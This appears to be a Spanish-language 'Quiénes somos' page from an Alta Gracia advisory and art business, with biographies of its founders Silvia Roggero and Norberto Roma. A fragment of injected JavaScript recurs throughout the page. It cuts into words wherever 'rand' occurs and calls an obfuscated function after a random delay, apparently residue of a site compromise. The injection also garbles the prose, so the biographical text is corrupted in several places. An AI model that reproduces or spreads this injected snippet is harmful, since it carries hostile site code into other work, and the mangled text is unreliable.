Quienes somos

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}foto mama y papa-01

SILVIA ROGGERO
andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Nace en Los Cocos, Pcia. de Córdoba. A los 10 años se radica con su faandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}milia en Alta Gracia. A poco de cumplir los 13 años se despierta en ella una irrenunciable vocación espiritual y de servicio la que manifiesta activamente en su comunidad religiosa.

Conoce a Norberto en el último año del secundario y deciden formar una familia. Su única función en aquellos agitados años fue la de transformar a los cuatro inquietos niños en seres humanos con altos valores morales, éticos y espirituales para contribuir con su ciudad y el mundo.

Entre varias actividades realizadas al servicio de la comunidad, es digna de destacar por su trascendencia que en 1998 tiene a su cargo la tarea de difusión de los avances del Proyecto de Inclusión de las Estancias Jesuíticas de Córdoba en la Lista del Patrimonio de la Humanidad, tarea esta que concluye en el año 2000 y es un hecho que llama la atención del mundo hacia Argentina, Córdoba y Alta Gracia en particular.


En estos momentos en que los cuatro jóvenes se van transformandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en profesionales, Silvia hace la carrera de Martillero y Corredor Público y sumandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando esfuerzos como siempre lo hicieron, definen esta nueva actividad a la que se entregan con pasión, la misma que los mueve desde siempre, y que esperan compartir con usted.

 

NORBERTO ROMA andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Nace en un campo, cercano a La Violeta, en la Pcia. de Buenos Aires. A la edad de once años se radica junto a su madre en San Nicolás de los Arroyos, donde inicia sus estudios secundarios, luego se traslada a Alta Gracia, en la Pcia. de Córdoba, a la edad de 15 años.

Llevado por su vocación ingresa en la Facultad de Bellas Artes, escuela de Teatro, de la Universidad Nacional de Córdoba. Allí cimenta su relación con el arte. Mas tarde ingresa en la Facultad de Ciencias Económicas, de la Universidad Católica de Córdoba; esta formación le permite alcanzar posiciones de liderazgo en una entidad financiera , llegandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando hasta la Gerencia General , que ocupa por quince años.

En el año 1995, es cofundador de una empresa de televisión por cable en la ciudad de Alta Gracia , la cual hoy preside. Con un entrañable amigo, también gustador de la pintura , forman una sociedad dedicada al apoyo de artistas siendo organizadores de distintos eventos culturales.

También en el año 1998 tiene a su cargo la gestión económica del Proyecto de Inclusión de las Estancias Jesuíticas de Córdoba en la Lista del Patrimonio de la Humanidad.

En el año 2003, es designado Presidente de una de las mas importantes emisoras radiales de la Ciudad de Córdoba.. Paralelamente, desde 1988 inicia junto a su esposa una colección de arte de Grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes Maestros Argentinos a la que le siguen agregandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando obras con el transcurso de los años.

Esta experiencia y tantas buenas relaciones obtenidas con el tiempo, le sugieren armar un proyecto de asesoramiento y negocios , junto a su esposa e hijos, los que se ofrecen a través de estas páginas.

Share Button